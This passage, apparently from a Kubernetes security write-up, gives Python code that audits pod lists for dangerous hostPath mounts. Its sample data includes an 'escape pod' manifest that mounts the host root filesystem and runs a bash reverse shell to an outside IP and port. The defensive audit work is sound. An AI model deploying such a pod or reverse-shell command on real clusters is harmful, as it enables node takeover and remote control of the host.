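    findings: List[Dict[str, Any]] = []
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        for m in c.get("volumeMounts", []):
            hp = host_vols.get(m.get("name"))
            if hp is None:
                continue  # not a hostPath-backed mount
            read_only = bool(m.get("readOnly", False))
            sensitive = _is_sensitive(hp.get("path", ""))
            findings.append({
                "namespace": meta.get("namespace", "default"),
                "pod": meta.get("name"),
                "container": c.get("name"),
                "host_path": hp.get("path"),
                "mount_path": m.get("mountPath"),
                "read_only": read_only,
                # A writable mount of a node-critical path is a node takeover.
                "severity": "critical" if sensitive and not read_only else "warning",
            })
    return findings


def audit_pod_list(pod_list: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Audit a v1 PodList (kubectl -o json or the kubelet /pods shape), critical first."""
    out: List[Dict[str, Any]] = []
    for pod in pod_list.get("items", []):
        out.extend(host_path_findings(pod))
    return sorted(out, key=lambda f: (f["severity"] != "critical", f["namespace"], f["pod"]))


# Constructed pod list: the escape pod from the manifest above, the box's nginx
# pod, and a hypothetical read-only log-reader pod to show the severity split.
SAMPLE_POD_LIST = {
    "kind": "PodList",
    "apiVersion": "v1",
    "items": [
        {
            "metadata": {"name": "nginx", "namespace": "default"},
            "spec": {"containers": [{"name": "nginx", "image": "nginx:1.14.2"}], "volumes": []},
        },
        {
            "metadata": {"name": "mosa-pod", "namespace": "default"},
            "spec": {
                "containers": [{
                    "name": "mosa-pod",
                    "image": "nginx:1.14.2",
                    "command": ["/bin/bash"],
                    "args": ["-c", "bash -i >& /dev/tcp/10.10.16.4/9001 0>&1"],
                    "volumeMounts": [{"name": "host", "mountPath": "/host"}],
                }],
                "volumes": [{"name": "host", "hostPath": {"path": "/", "type": "Directory"}}],
            },
        },
        {
            "metadata": {"name": "log-reader", "namespace": "default"},
            "spec": {
                "containers": [{
                    "name": "reader",
                    "image": "busybox",
                    "volumeMounts": [{"name": "logs", "mountPath": "/logs", "readOnly": True}],
                }],
                "volumes": [{"name": "logs", "hostPath": {"path": "/var/log"}}],
            },
        },
    ],
}

if __name__ == "__main__":
    for f in audit_pod_list(SAMPLE_POD_LIST):
        print(f"{f['severity']:8} {f['namespace']}/{f['pod']} ({f['container']}): "
              f"{f['host_path']} -> {f['mount_path']} read_only={f['read_only']}")
```

Run against a live cluster by feeding it json.load of kubectl get pods -A -o json. On this box the audit would flag mosa-pod as critical the moment it was created, whereas the nginx pod, which has no hostPath at all, produces nothing; the read-only /var/log mount shows why severity is tied to both the path and the mount mode.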

